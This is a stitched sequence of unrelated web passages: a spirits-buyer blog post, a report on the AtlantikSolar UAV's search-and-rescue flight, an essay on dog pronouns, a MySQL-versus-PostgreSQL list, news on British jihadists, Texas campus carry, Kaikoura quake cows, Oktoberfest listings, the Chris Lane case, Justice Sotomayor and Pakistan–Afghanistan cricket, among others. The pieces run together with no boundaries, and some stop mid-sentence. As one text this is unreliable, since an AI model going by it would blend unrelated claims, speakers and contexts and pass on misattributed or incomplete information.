Personally, I'm not worried. The fact that I was just able to buy a mountain of the Old Forester 1920 Prohibition Bourbon is the result of this phase in the market (and it's good news for people who actually like to drink). This was my favorite Bourbon release of 2016: a rich, weighty, oily, supple mouthful of Bourbon goodness at 115 proof for a reasonable mid-range price. Yet, because it's not allocated or age-stated, there's plenty to be had. I've learned a lot about comparative analytics since becoming K&L's assistant head buyer last year and having worked extensively with our head buyer and owner Clyde Beffa Jr. They call Clyde "the King of the Off-Vintage" in Bordeaux because while everyone else is clammering for the hot vintages like 2000, 2005, and 2009, he's looking for deals in less-hyped years like 2001, 2007, and 2012. He's much more excited when he finds an overlooked $20 gem from 1998, than a $4000 case of Haut-Brion from 1995. But that's because Clyde likes to actually drink Bordeaux, not fawn over it or show it off. He drinks Bordeaux every night of the week. He's basically just looking out for his own interests and the people who shop for Bordeaux at K&L are thrilled to enjoy the same benefits.
Expect a similar philosophy in the K&L spirits department this year: looking out for the interests of drinkers who drink because they like drinking.
-David Driscoll
One year after having demonstrated the 81-hour continuous solar-powered flight that is still the current world record in flight endurance for all aircraft < 50kg total mass, the AtlantikSolar UAV has completed its next milestone by demonstrating the first-ever fully-autonomous (from launch to landing) solar-powered perpetual flight with significant payload (Color + Thermal Camera) in a 26-hour Search-and-Rescue (SaR) mission.
While the 81-hour and 28-hour endurance record flights were important milestones that demonstrated the perpetual endurance capability of AtlantikSolar, they required manual pilot control for launch and landing and did not carry any aerial imaging payload.
However, the missions that our team really cares about – Search-and-Rescue missions relying on long-endurance aerial sensing to support authorities e.g. in the European refugee crisis currently unfolding over the Mediterranean Sea – require both of these elements, i.e. ease-of-use through full launch-to-land aircraft autonomy and significant payloads to help the rescue teams with the detection of victims on land and sea.
The 26-hour solar-powered Search-and-Rescue flight performed by AtlantikSolar AS-3 from July 19th – 20th 2016 demonstrated exactly that, and is therefore the first-ever flight world wide to combine:
Perpetual flight : 26-hours of solar-powered day/night- and thus energetically-perpetual flight
: 26-hours of solar-powered day/night- and thus energetically-perpetual flight Full aircraft autonomy : No pilot stick moved within 26-hours of flight
: No pilot stick moved within 26-hours of flight SaR payload : The aircraft carried a 10 Watt 300g payload (1 Color camera, 1 Thermal Camera, 1 ODROID onboard computer with WLAN) and performed victim detection from the air during day and night.
: The aircraft carried a 10 Watt 300g payload (1 Color camera, 1 Thermal Camera, 1 ODROID onboard computer with WLAN) and performed victim detection from the air during day and night. Environment-aware: The aircraft performed automatic thermal updraft tracking for increased energetic efficiency and to speed up the battery recharge.
Flight summary
The 26-hour flight was started on July 19th at 18:02 local time in Hinwil, CH with full batteries. The launch was performed fully autonomously: After all system checks were complete, the aircraft was tossed in the air via a hand-launch and then continued automatically and without pilot interaction towards its first loitering waypoint. The respective flight control technology is based on an ETHZ/3DR Pixhawk autopilot with a custom flight controller designed at the Autonomous Systems Lab. Equipped with a color camera, thermal camera, an onboard computer and wireless LAN, the aircraft began live-streaming the respective images. The full payload was operated until around 21 o'clock, after which the color camera was switched off because of the insufficient lighting conditions. The batteries were at 95% state of charge at that time, having started their discharge shortly before 20 o'clock. Note that operating a fully fledged SaR payload consuming 10W is a significant challenge for perpetual flight on a small-scale solar-powered UAV such as AtlantikSolar, and the overall power consumption of ~60W was thus closely tracked during the first hours of the evening flight.
The actual testing of the Search-and-Rescue capabilities were started shortly before 23 o'clock: With the aircraft now flying in total darkness, the infrared camera served as the only source of aerial imaging information. As visible in the video, the payload system clearly manages to find the victim lying in low grass (and surrounding houses, tents, cars, the streets and especially the warm electric generator) at 23:05 o'clock. The victim detection was performed manually by the ground station operator based on the live-streamed images this time. However, the next AtlantikSolar test flight will have automatic on-board victim detection (as already tested in the ICARUS search and rescue project) implemented. The demonstrated capabilities are integral elements of perpetual flight aerial victim detection missions – we are convinced that they can be of great help in solving pressing issues such as the European refugee crisis of 2015 and 2016 above the Mediterranean Sea.
Despite heavy winds of up to 8m/s, the Search-and-Rescue support activities with the infrared camera payload were continued throughout the rest of the night. First sun was hit at 06:20 local time on July 20th, and the minimum battery state of charge was reached with 26% battery energy remaining at 08:04 o'clock. Considering the additional payload power consumption (and mass) of 10W , this energetic margin – achieved on July 20th, and thus about one month after the solar solstice on June 21st – is a success and even exceeds the margin of 23% predicted by our simulations. To accelerate the battery recharging process, the aircraft also implemented autonomous thermal updraft tracking that was enabled during the late morning once thermal updrafts were encountered (see video). Multiple “free” altitude gains of >100m were achieved this way – again without any pilot interaction. The batteries were fully re-charged at 15:30 o'clock.
As a final step, and after 26-hours of solar powered flight, the aircraft performed a fully autonomous landing at the Hinwil, CH airfield. Using its lightweight LIDAR (Light Detection And Ranging) sensor to measure its distance to the ground, AtlantikSolar – a hard to fly aircraft that can usually only be steered and landed by extremely experienced pilots – could safely perform the automatic landing. We consider the demonstrated full flight autonomy a vital step to allow search-and-rescue support teams, which usually do not possess extensive UAV flight training, to benefit from the signficant advantages of solar-powered and in general high-performance UAVs.
Further information
Detailed design and technical information on the UAV platform can be found in “Oettershagen P, Melzer A, Mantel T, Rudin K, Lotz R, Siebenmann D, Leutenegger S, Alexis K, Siegwart R (2015), A Solar-Powered Hand-Launchable UAV for Low-Altitude Multi-Day Continuous Flight. In: IEEE International Conference on Robotics and Automation (ICRA)” [Download] . An additional up-to-date publication including the research for this flight is planned.
There's something undeniably frustrating about a snooty woman and a poodle replying “Oh, she is a she,” to the question ‘what's his name'? Of course, this is mostly due to the fact that humans don't place a huge emphasis on the gender identity of dogs, and from what we humans can observe, neither do they! Many rightfully express discontent with the pronoun ‘it' when used to describe their dog, but the only apparent physical difference between the sexes of dogs is their genitalia (I think. I'm not a dog expert, but that's the only obvious way I can differentiate them). Seeing as dogs don't have much of a concept of gender, it makes sense that humans categorize them by their genitals, but there's a problem in doing so: my adorable, spitfire shih-tzu had their balls surgically removed before they hit the age of 3 months.
Humans, the only living beings to really give a damn about how lifeforms are categorized, have recently found beautifully neutral, fair, and androgynous pronouns to add to the spectrum of gender: they/them/their. Someone argued that this, when applied to dogs, may devalue the science behind behavioral and physiological studies of dogs, which is true. For instance, without sexual differentiation, we would not have collected nearly as much crucial scientific information about the species, whether it is in the form of unknown sex-specific glands or simply answering the question “will my dog go into heat and moan while humping the leg of the couch for hours on end?”
So frankly, if you are reading this as a sort of dog expert where a dog's sex (as opposed to gender) matters, this article doesn't totally pertain to you. Instead, I would like to question the other possible applications to assigning a gender to another form of life, just for the sake of categorization. I have pondered this for some time now, to no avail.
Humans seem to be one of the only species to notice gender identity and allow it to have real-world consequences, like the wage gap, bathroom situation, or even representations of power. It's no secret that men are more likely to be taken seriously, especially when considering the fact that we still haven't had a female president and gender norms and expectations are clearer than ever. As human beings living in the 21st century, however, I am happy to say that we are at least addressing these issues. But anyways, back to dogs...
Imposing a binary gender structure exactly like ours based on the genitalia of dogs is like imposing a vegan diet on dogs because we can choose to be vegan. You can't do that. To break the masculine cisgender spell that encompasses our society, we should familiarize ourselves with androgynous pronouns and un-taboo the taboo of gender, and to work up to humans, we should start by eliminating the gender spectrum of dogs—they don't care, they don't need it, they probably don't know it exists, and it's futile.
1 - Indexing SupportMySQL cannot utilize more than one index per query. I believe this is worth repeating: MySQL CANNOT UTILIZE MORE THAN ONE INDEX PER QUERY. Wait till your tables get large enough and this will surely hit you. OTOH PostgreSQL can use multiple indices per query which come real handy.2 - Full Text Indexing SupportMySQL can do full text indexing on MyISAM tables only, those working with InnoDB tables are out if luck. PostgreSQL has very advanced full text indexing capabilities wich enable you to control the tiniest details down to the stemming strategy.3 - Asynchronous InterfaceMySQL drivers are very unfriendly to the Ruby interpreter. Once a command is issued they take over until they come back with results. PostgreSQL sports a completely asynchronous interface where you can send queries to the database and then tend to other matters while the query is being processed by the server. The good news is that an Async ActiveRecord adapter for MySQL is being developed right now, as part of the rapidly growing NeverBlock library.4 - Ruby Threading AwarePostgreSQL dirvers enable the Ruby thread scheduler while IO requests are being processed (a nice side effect of the async interface). Which makes it much better suited for multithreaded Rails apps.5 - Multistatements Per QueryBoth MySQL and PostgreSQL support sending multiple statements separated by semi colons at once. But the returning result will be that of the last statement in the group. Now did you know that by using the async interface you can send multiple queries at once and then get back the results, one by one? One of the coolest features of the coming ActiveRecord (and Sequel btw) adapter is it's support for queuing queries to be consumed by a pool of connections. A trick we are contemplating working on is to group consequent selects together and send them in a single request to PostgreSQL and then later extract the results associated with each one of them. This is still very theoretical but should be verified soon.Now that the 0b101 reasons are told I rest my case.
Mohammed el-Araj, left, and Abu Hujama al-Britani, right, both from London, died fighting with al-Qaeda-linked rebels in Syria
Dozens of British jihadists have become so disillusioned with fighting in Syria that they have contacted the UK begging to come home.
One jihadist, claiming to represent 30 Britons, approached an intermediary to complain of growing despondency among the men in his group. They had gone to fight against President Assad's regime but were instead engaged primarily in fierce combat with rival rebel groups, he said.
The man, who cannot be named, contacted researchers from the International Centre for Study of Radicalisation and Political Violence (ICSR) at King's College London via social media in the past two weeks. He effectively sought amnesty, saying that the group feared long prison terms but would be willing to enrol on a deradicalisation programme and submit to surveillance.
The…
By Meagan Day
University of Texas President Gregory Fenves sounded reluctant this week as he announced that the system would comply with a new state law permitting students to bring guns into classrooms.
Supporters of the law say that a freely armed student population will save lives in the event of a school shooting. They even held a mock mass shooting on the UT Austin campus to drive home their point. “Our goal is to instill the importance of everyone to be able to defend themselves in any way they choose,” said the gun rights group that organized the demonstration, in a statement that referred to gun-free campuses as “victim disarmament zones.”
The law is slated to take effect on August 1, the 50th anniversary of the deadliest school shooting in the state's history, and by many accounts the first in the nation. In 1966, an ex-Marine and engineering student named Charles Whitman ascended to the observation deck of the Austin campus' 30-floor clock tower. Whitman began shooting at random, hitting 43 people and killing 13 of them.
© Shel Hershorn/Life
According to gun rights groups, the new law would prevent such tragedies. But there's some irony in their choice of the UT shooting as a commemorative occasion. It so happens that many students on the UT campus were armed in 1966, and many of them fired at Whitman, who was ultimately killed by a police officer. Whether civilian gunfire was helpful that day remains a matter of debate.
An oral history of the shooting compiled by Texas journalist Pamela Colloff features several eyewitness accounts of civilians taking up arms.
The South African novelist J. M. Coetzee, then a PhD candidate at UT, was on campus that day. “I hadn't fully comprehended,” he told Colloff, “that lots of people around me in Austin not only owned guns but had them close at hand and regarded themselves as free to use them.”
“It seemed like every other guy had a rifle,” said Ann Major. “There was a sort of cowboy atmosphere, this ‘Let's get him' spirit.”
“I don't know where these vigilantes came from,” said Brenda Bell, “but they took over Parlin Hall and were crashing around, firing guns. There was massive testosterone.”
Another eyewitness described “two guys in white shirts and slacks running across the lawn of the Pi Phi house, hustling up to its porch with rifles at the ready.” Yet another remembered that “students with deer rifles were leaning up against telephone poles, using the pole, which is rather narrow, as their shield. And they were firing like crazy back at the tower.”
Smoke could be seen from Whitman's gun as he fired from the tower of the University of Texas administration building at people below. © AP
Luckily, none of these civilian bullets hit innocent bystanders. But none of them hit Whitman, either. A group of three police officers and one civilian made their way to the observation deck and killed Whitman after 96 minutes of mayhem and bloodshed.
After the shooting spree ended, people amassed at the base of the tower in shock. “There wasn't a breeze moving in any direction,” said Clif Drummond, “and the crowd was totally quiet. It was so hot that you could almost see the heat. There were lots of rifles — all on safety, barrels pointed up, butts resting on waistbands. You could see the barrels sticking up out of the crowd.”
Texas gun rights advocates insist that the new law will make campuses safer by increasing the likelihood that a school shooter would be shot by a civilian. By beginning to enforce the law on the 50th anniversary of the UT shooting, Texas legislators are implying that the law would somehow prevent another such shooting. But Texas students were freely armed in 1966, and Charles Whitman still managed to kill 14 people.
Gun rights advocates staged a “mock mass shooting” at the University of Texas to show support for a law allowing guns on campus. © DontComply.com/YouTube
By some accounts, the civilian gunfire did hinder Whitman and save lives. The officer who killed Whitman, Ramiro Martinez, wrote in his autobiography that “The sniper did a lot of damage when he could fire freely, but when the armed citizens began to return fire the sniper had to take cover.”
But one of Whitman's surviving victims, a woman named Claire Wilson, said that the pandemonium caused by student shooters only made the situation worse. She lay on the ground bleeding next to her dead boyfriend for an hour and a half as bullets whizzed by. Gunfire by well-intentioned civilians, she said, delayed her rescue.
Wilson, who was pregnant at the time and lost the baby, said that she could feel her legs burning on the hot pavement. A nurse who attended to the wounded told Colloff that “some of the kids that had been shot and had to lie out on the cement for a while had first- and second-degree burns.”
Timeline spoke to Gary Lavergne, author of the only nonfiction book about the shooting, who said there was no way of knowing whether the threat armed civilians posed to Whitman outweighed the threat they posed to each other.
“No one really knows the extent to which the return fire from civilians was helpful,” said Lavergne. He added, “But even if you accept that the armed civilians were primarily helpful that day, it doesn't follow in my opinion that they would be helpful in 2016.”
Lavergne explained that students felt the need to defend themselves because they knew not to expect a robust police response. “The Austin police department didn't have a SWAT team,” Lavergne said. “They didn't have appropriate weapons or communication gear. They didn't even have appropriate shoes. One of the officers who stormed the deck told me that he was wearing penny loafers, and was slipping and sliding on the blood.”
An armed civilian looks up at the clock tower while students take cover nearby. © Texas Archive of the Moving Image
That's not the case in 2016. “The Austin Police Department, and every police department, is much better able to handle a situation like this than 50 years ago,” Lavergne said. “And because of that, it's not clear to me that armed civilians would be especially useful in a mass shooting situation today.”
Detractors of the new legislation point out that on days when there is no mass shooter — which is most of them — the guns in students' pockets will be the biggest dangers on campus. University of Texas Chancellor William McRaven opposed the law because he was concerned about self-inflicted gunshot wounds, impulsive violence arising from interpersonal conflict, and accidental discharges, all of which are far more common than mass shootings.
“I like guns,” said McRaven in an interview with NPR. “I'm a big Second Amendment guy. I've probably got nine guns and six swords and two tomahawks, so I'm all about weapons. My concern has just been that … I want to make sure that we make our campuses as safe as possible. And the addition of concealed weapons on campus just didn't seem like a good idea to me.”
“Having said that,” he added, “now that we have to implement this, I'm going to take every step possible to ensure the maximum safety.” UT plans to do this by designating some areas as gun-free zones, with the permission of the Texas Legislature.
UT President Fenves mirrored McRaven's tone of begrudging compliance. “I do not believe handguns belong on a university campus,” he said, “so this decision has been the greatest challenge of my presidency to date.”
Cows across Kaikoura are living in destroyed paddocks after the quakes.
Two more cows have been spotted stranded on an outcrop of land near Kaikoura, only hours after a group of three cows that captured the nation's attention were rescued.
A Fairfax photographer captured the image of two cows looking up on a small piece of grassy land about 15km from the seaside town.
Federated Farmers general communications manager Leigh Catley said there is "no way of knowing" how much livestock were affected after Monday's 7.5 magnitude earthquake wiped out all surrounding land.
The landslides have left the cows stranded on small outcrops with sheer drops on all sides.
READ MORE:
* Live: 7.5 magnitude quake
* What you need to know - Tuesday
* Relief en route for Kaikoura
* NZ sits on a knife-edge as true cost of damage is counted
"We're not even sure how many farms we're dealing with yet," said Catley.
NEWSHUB. A family of cows is trapped on a tiny earthquake made island.
"It's predominantly a dry stock region with beef and sheep. There's some very, very big properties in that region so we're probably talking about a reasonable number of stock."
Earlier today a group of cows left stranded on an earthquake island were reportedly saved.
Rescuers dug a trench to free the cows from the small dirt peak where they were trapped, Newshub reported.
The cows caught the world's attention on Monday night with footage showing their peril – trapped on a quake island.
A chopper, flying over torn farmlands outside Kaikoura, captured the image of two cows and a calf huddled together on a small piece of grassy land. Monday's magnitude 7.5 earthquake had wiped out all surrounding pasture, leaving a sea of dirt around the cows' refuge.
The rescue effort had to be delayed because the team weren't sure if the ground below them was safe to travel across, Newshub said.
A farmer reportedly told the network that other cows had died because of the quakes.
Some calves, from the stranded cows' family, were believed to be dead. The mother cows were reportedly "a bit distressed".
The Ministry of Primary Industries was unable to confirm if the cows had been saved. Reports saying the cows had been rescued could not be verified, a spokeswoman said.
Under the national Civil Defence plan, MPI is responsible for animal welfare.
Despite the huge support for the cows, with social media demanding they be saved, police said they had to prioritise the wellbeing of people. Police were not involved with any cow rescue mission.
"The priority of the police is to make sure all human lives are safe and we still need to account for all of them yet," a police spokesperson said.
Wellington SPCA CEO Steve Glassey said on Tuesday morning that a specialist National rescue Unit would save the cows, if needed.
SPCA's National Rescue Unit is made up of staff and volunteers from Wellington SPCA. It has been operating for 20 years without failure.
However, Glassey cautioned that, although the unit would be aiming for a live outcome, the likely result would be humane euthanasia of the stranded cows.
"If anyone is able to do this rescue, it's the NRU. If they can't do it, no one can," Glassey said.
Social media and news stations throughout the world rallied behind the stranded cow family.
Ok I will donate to any kickstarter that will rescue these poor sweet stranded cows whoare with me #eqnz pic.twitter.com/idssGaAXTH — it me, ash 💁🏼 (@ashsparkle) November 14, 2016
There are plenty of good reasons for the optimism. With the development of its massive shale deposits, the United States has become the world's single largest producer of natural gas. We're so awash in it that domestic prices have plummeted to historic lows. Advances in drilling technology have also made it possible to access hard-to-tap "tight" oil reserves in states such as North Dakota. Analysts believe those fresh crude sources could yield 2.9 million barrels of oil a day by 2020, up from 900,000 today. Meanwhile, cars are getting more efficient, and fuel use has dropped after soaring during the last decade, which frees up more energy production for export. According to Bloomberg, the U.S. is already getting 81% of its energy from domestic sources, the largest share since 1992, and up 10 percentage points since 2005.
Then, there's Canada, which now claims the world's third largest oil reserves thanks to Alberta's petroleum rich tar sands. That's important because Canada and the U.S. are family when it comes to global trade. They're currently our single largest oil supplier. We sell them 75% of their imports and buy 75% of their exports. The National Petroleum Council, which advises the White House on energy issues, believes that by 2035, the two countries combined could more than double their oil production to 22.5 million barrels a day, enough to satisfy their current total consumption.
If you're not too concerned about how much carbon gets pumped into the atmosphere over the next few decades, these are all great developments. (If you do care about global warming, these are all reasons to have a stiff drink, and perhaps consider moving far from the coasts). But even if we're approaching energy independence, the chances of ever actually getting there are rather slim, especially if our economy is still running on oil in 20 years.
MANAGE YOUR EXPECTATIONS
It may theoretically be possible for the U.S. and Canada to more than double our oil output, as the NPC suggests. To put that in perspective, we'd be adding the rough equivalent of another Saudi Arabia to the world oil market. To do it, the countries would have to pretty much tap every resource they have, both onshore and off. Obviously, the old "drill baby drill" crowd would love that approach. But it's' still controversial in coastal swing states like Florida. Beyond that, accessing some of the resources would require technology we don't have yet.
In the most likely scenarios, North American oil production will get a big boost in the coming years. It just won't be enough for us to start waving goodbye to OPEC. The U.S. Energy Information Administration forecasts that the American oil production will reach 6.7 million barrels a day by 2020, up from 5.5 million in 2010, then drop back to 6.1 million by 2035. Canada's National Energy Board foresees future production doubling to 6.0 million barrels per day by that year. So we'd end up with about 12.1 million barrels a day, around two-thirds* of what the United States currently chugs through on its own.
⌈ Secret Post #2423 ⌋
Warning: Some secrets are NOT worksafe and may contain SPOILERS.
01.
________________________________________ __________
02.
[Amanda Palmer]
________________________________________ __________
03.
[Breaking Bad]
________________________________________ __________
04.
[Free]
________________________________________ __________
05.
[Urdnot Wrex (Mass Effect)]
________________________________________ __________
06.
[Star Trek: Deep Space Nine]
________________________________________ __________
07.
[My Chemical Romance]
________________________________________ __________
08.
[Prince Philip, Duke of Edinburgh]
________________________________________ __________
09.
[Twin Peaks, Audrey Horne and Agent Dale Cooper]
________________________________________ __________
10.
[Johnny Weir, American figure skater]
________________________________________ __________
11.
[Star Trek: The Next Generation]
________________________________________ __________
12.
[Arrested Development]
Secret Submission Post #346
02 pages, 026 secrets from[ 0 - broken links ], [ 0 - not!secrets ], [ 0 - not!fandom ], [ 0 - too big ], [ 0 - repeat ].Suggestions, comments, and concerns should go here
A Christmas Story 2 is a 2012 film directed by Brian Levant and starring Daniel Stern and Braeden Lemasters.[1] The film is a direct sequel to the 1983 film A Christmas Story, which ignores the events of the 1994 film My Summer Story. It was released straight to DVD on October 30, 2012.[2]
Although billed as an "official sequel" in the trailer, the film is not directly based on Jean Shepherd's writings, instead relying on an original script by Nat Mauldin, who also narrates the movie in place of the late Shepherd. (The subplot of Ralphie and his friends finding jobs and then getting fired was originally by Shepherd and had previously been included in the telefilm Ollie Hopnoodle's Haven of Bliss.)
Plot [ edit ]
The film takes place in 1946. Ralphie is now fifteen years old, and all he wants is a used 1939 Mercury Eight convertible for Christmas. He tries testing the car out when he sees it on a display ramp, but he accidentally causes the car to roll back out of the used car lot and gently tap a light pole, causing a plastic reindeer on the pole to loosen and fall through the convertible top. Ralphie bands together with Flick and Schwartz to raise enough money to pay the dealer back for fixing it before Christmas so that the car dealer won't have Ralph arrested and presumably thrown in jail. He and his friends get a job and after going through several departments at the Higbee's store and in the end getting into a fight with the store Santa and then each other they all get fired. Ralphie does get his job back after some begging and pleading, but by Christmas Eve he finds he is still $1 short, so he and Flick rob Schwartz of his "lucky buck". While on the way to the dealer, Ralphie decides to donate a chunk for a less fortunate family. He winds up still off the hook with the owner of the dealership. In the end he does get the car he wants for Christmas and the girlfriend he wants to go with it.
Cast [ edit ]
Reception [ edit ]
Trailer [ edit ]
Prior to the film's release the initial reception to the film's trailer was predominantly negative.[3][4]
Film [ edit ]
FleshEatingZipper panned the movie, writing that the slapstick elements in the film detracted from the movie while praising the attempt to "replicate a 40s-era Midwest".[5] Brian Orndorf of Blu-ray.com wrote, "Shamelessly derivative and plasticized, A Christmas Story 2 will only have you wondering why you're not watching the original picture again."
Just because it's approximately 7,590 miles from Munich to Honolulu that doesn't mean you can't celebrate Oktoberfest in the Islands. While this autumn festival traditionally goes for 16 days in Germany (Sept. 19-Oct. 4 this year), Oktoberfest events in Hawaii are scheduled through the end of October. Check out these Bavarian-themed bashes so you can eat, drink and be merry, like the Germans, in the 50th State.
Hawaii Island
2nd Annual Kona Rocktoberfest
Saturday, Oct. 24
This party at the King Kamehameha Beach Hotel will have live music by Maka, Green Machine, The Darkroom and Leche De Tigre with a guitar showdown called “Guitarmegheddon.” In addition to the musical performances, there will be improv comedy by The Alohahas, two Halloween costume contests and a chicken dance off. $20 advance, $30 at the door. 2:30 to 8:30 p.m., King Kamehameha Kona Beach Hotel, 75-5660 Palani Road, Kailua-Kona, konarocktoberfest.com.
16th Annual Oktoberfest Hilo Bay presented by Rotary Club of Hilo
Friday, Oct. 2
The Rotary Club of Hilo honors Lucille Chang and Barry Taniguchi at this German-style celebration. $50, 5 to 8:30 p.m., Sangha Hall, 398 Kilauea Avenue, Hilo, hilobayrotary.co
Maui
6th Annual Oktoberfest for Pacific Cancer Foundation
Saturday, Oct. 17
This Oktoberfest event features German-inspired food and craft beer to benefit the Pacific Cancer Foundation, a nonprofit that is focused on providing access, knowledge and support to improve the quality of life for cancer patients, survivors and their families. $35 advance, $45 at the door, 3 to 10 p.m., Maui Brewing Co., 605 Lipoa Parkway, Kihei, purchase tickets here.
Black Rocktoberfest
Thursday, Oct. 1-31
Sheraton Maui Resort & Spa Chef de Cuisine Jeffrey Rayno created a special Oktoberfest menu for Black Rock Kitchen that features soft German pretzel sticks with beer cheese sauce, paired with a bright and hoppy Pinkus Pilsner; followed by bratwurst stewed in beer and sauerkraut with a spicy honey and pineapple mustard sauce, balanced by a malty and smoky Aecht Schlenkerla Rauchbier Marzen; next is an apple cider brined pork chop with mustard spätzle, red cabbage and mustard beer braised apples, paired with Maui Brewing Company's Kihei Kolsch; and a black forest cake with sour black cherry filling and cherry gastrique, accompanied by Big Island Brewhaus White Mountain Porter.$45 per person, and $15 for corresponding beers, 5:30-9 p.m., for reservations call (808) 662-8053.
Oahu
Hard Rock Café Samuel Adams Octoberfest Beer and Schnitzel Burger
Sept.22-Oct. 31
For a limited-time Hard Rock Café and Samuel Adams are celebrating the quintessential Bavarian festival with the Samuel Adams OctoberFest schnitzel burger and beer. Enjoy the German flavors of a lightly-breaded pork cutlet, sauerkraut, mustard on a pretzel bun and wash it down with a nicely-paired Samuel Adams OctoberFest beer. Sunday through Thursday 11 a.m. to 11p.m., Friday and Saturday 11 a.m. to 12 a.m., 280 Beach Walk, hardrock.com/cafes/honolulu/.
Eat the Street: Oktoberfest
Friday, Sept. 25
Enjoy German cuisine from local food trucks at the new Makers & Tasters space at Kewalo Basin with live entertainment and a happy hour from 5 to 7 p.m.. Free, 5 to 10 p.m., Makers & Tasters Kewalo, 1011 Ala Moana Boulevard,
eatthestreethawaii.com.
Hale Koa Oktoberfest
Sept. 30-Oct. 3
Transport yourself to Munich, Bavaria, Germany with Hale Koa's popular annual event that features a sit-down dinner, live band and plenty to drink.
$12 advance, $18 at the door, 5:30 p.m., Banyan Tree Showroom, Hale Koa Hotel, 2055 Kalia Rd, Honolulu, halekoa.com/current-specials.html.
Okakopa Hoolaulea (Fourth Annual Octoberfest in Hawaii)
Sunday, Oct. 4
“Okakopa” is “October” and “hoolaulea” is “celebration” in Hawaiian, and the main attraction for the aforementioned Oktoberfest is a car show with two judging classes as well as food, drinks and entertainment. The automobile show, produced by the Mercedes-Benz Club of America Hawaii, raises funds for Hawaii public school programs. Free, 11 a.m. to 5 p.m., Makers & Tasters Kewalo, 1011 Ala Moana Boulevard, Honolulu, okakopafest.org.
Hawaii Prince Hotel Waikiki presents Oktoberfest
Friday, Oct. 9
Special guest, Chef Fuido Ulmann, headlines a night of Bavarian flavors with the Edelweiss Trio provding the music. There will also be three contests that evening: bratwurst eating, chicken dance-off and stein-hoisting. $10 pre-sale by Oct.8, $15 at the door, children 5 and under are free, 5:30-10:30 p.m., Mauna Kea Ballroom, 100 Holomoana Street, Honolulu, for tickets click here.
Kauai
Oct. 5-10
Kauai Beer Company is hosting a week of Oktoberfest festivities on the Garden Island with a special menu launching on Monday, Oct. 5, a food truck throwdown on Thursday, Oct. 8 and trivia night on Saturday, Oct. 10. They're also serving their annual Oktoberfest Marzen, a malty, seasonal lager brewed especially for the season. 4265 Rice Street, Lihue, kauaibeer.com.
Amid the countless comparisons between Trayvon Martin and Australian jogger Chris Lane's death, reports have erroneously identified the accused teen killers as black males – two with brown skin, one with light skin.
However, 17-year-old Michael Jones isn't even what people would consider “light-skinned.” In fact, he's not even black.
But in making a case that Rev. Al Sharpton and President Obama are illustrating a “double standard” by not advocating for Lane as they had Trayvon, a Fox and Friends segment described the three teens as black males, even though the photograph to accompany the segment showed two black teens and one white teen.
But the Daily Caller went even further, posting a fabricated line up of the “three black males” that shot and killed Lane. After realizing that the photograph of Michael Jones was incorrect, they showed viewers the real Jones, but still made a point to mention that he was “light,” not white.
Here's what they had to say about the now “racially ambiguous” teenager:
This, of course, changes everything. Edwards and Luna are being charged with first-degree murder, whereas Jones is charged with “using a vehicle to facilitate the discharge of a weapon and accessory after the fact of murder in the first degree.” There's your angle, Rev. Al. The one with the lightest skin got the lightest charge. The one who looks the least like Obama will get the least punishment. Let the racebaiting begin.
Confusing, huh? Just to clear things up, a Duncan police source confirmed to Mediaite on Wednesday that Michael Jones is indeed a white male. So there you have it.
But theories about why the boys committed the crime (despite their race) are even more interesting. While we're all infuriated by the senseless murder done out of “boredom,” Fox News is offering their own theory on why the boys chose to kill – too much abortion and Facebook, according to contributor Keith Ablow.
“We do have an epidemic of disconnectedness,” Ablow said, responding to a leading question from anchor Shannon Bream. “We have people saying they have hundreds of friends on Facebook, when those aren't friends and we have people text messaging when in fact they are not reaching out to anybody, because they are sending their thoughts and feelings in the air, if you will”: We have people on SecondLife.com simply adopting new identities and so we have a culture that is cheapening life, real life. And if in general, if you can't outlaw third trimester abortions in every state, then you have part of the answer to why people don't take life that seriously […] Facebook is the final common pathway for those people who are acting out in life and some of the people who are there are acting out their sexuality, other people are acting out how happy they are by posting all of these ridiculous pictures, where one is competing against the other to seem more content.
Interesting.
But the truth is, we may never know what triggered the killing. Maybe the gun violence culture in America, maybe the boys were misguided. Whatever the case, we do have this Vine, posted by one of the teens, that shows that he was obsessed with guns. And that may have been all the reason he needed to go out and shoot an innocent person.
As always, we send out condolences and prayers to Lane's family and friends.
SOURCE: Mediaite | Think Progress | YouTube
Also On Global Grind:
Justice Sotomayor Chastises Asst. U.S. Attorney For Race Baiting In Drug Case
Enlarge this image toggle caption Kainaz Amaria/NPR Kainaz Amaria/NPR
Usually when the United States Supreme Court refuses to hear a case, it does so without a lengthy opinion.
Today, however, Justice Sonia Sotomayor joined by Justice Stephen Breyer, issued a pointed rebuke of an assistant United States Attorney for the Western District of Texas.
The case involves a man who was arguing he did not know the two friends he was with intended to buy drugs. During the trial the assistant U.S. attorney, whom Sotomayor did not name, made a racist comment.
"You've got African-Americans, you've got Hispanics, you've got a bag full of money," the attorney said. "Does that tell you — a light bulb doesn't go off in your head and say, This is a drug deal?"
The court refused to hear the appeal, but Sotomayor took the opportunity to school the attorney in the history of race baiting in the U.S. judicial system.
The full statement is worth a read. Sotomayor says there was a time "when appeals to race were not uncommon when a prosecutor might direct a jury to '"consider the fact that Mary Sue Rowe is a young white woman and that this defendant is a black man for the purpose of determining his intent at the time he entered Mrs. Rowe's home."'
The bottom line, writes Sotomayor:
"It is deeply disappointing to see a representative of the United States resort to this base tactic more than a decade into the 21st century. Such conduct diminishes the dignity of our criminal justice system and undermines respect for the rule of law. We expect the Government to seek justice, not to fan the flames of fear and prejudice. In discharging the duties of his office in this case, the Assistant United States Attorney for the Western District of Texas missed the mark."
Sotomayor closes by saying she hopes "never to see a case like this again."
Pakistan and Afghanistan have agreed in principle to play T20 friendlies - as opposed to internationals - as part of their efforts to renew ties with each other. The matches are set to take place in Kabul and Lahore sometime in July and August.
A delegation led by ACB chairman Atif Mashal met with his counterpart in the PCB Shaharyar Khan in Lahore on Saturday. After lengthy discussions, the Pakistan board expressed willingness to provide Afghanistan with venues for training and conditioning camps and laid the groundwork for both their youth and senior teams to play reciprocal tours.
Major talking points Organise two friendly T20 matches between the two countries in Kabul and Lahore tentatively in July-August.
A preparatory camp for the ACB Under-19 team in Karachi, followed by a bilateral series between the Under-19 teams of both countries
Future bilateral series between the two emerging and 'A' teams, Under-16 teams, and explore the possibility of matches between regional teams of both countries.
PCB providing technical support through the training of ACB curators, scorers, umpires, analysts and coaches.
PCB to work on providing a stadium in Pakistan which ACB would use as a home venue.
Making PCB's biomechanical facility available for testing Afghanistan cricketers.
PCB will push for greater interaction of ACB in the Asian Cricket Council and in world cricket in general.
"The relationship between the two boards and the two nations is historic. It is not new," Mashal said. "I am here to renew our commitment and sports should not be influenced by the politics of two governments.
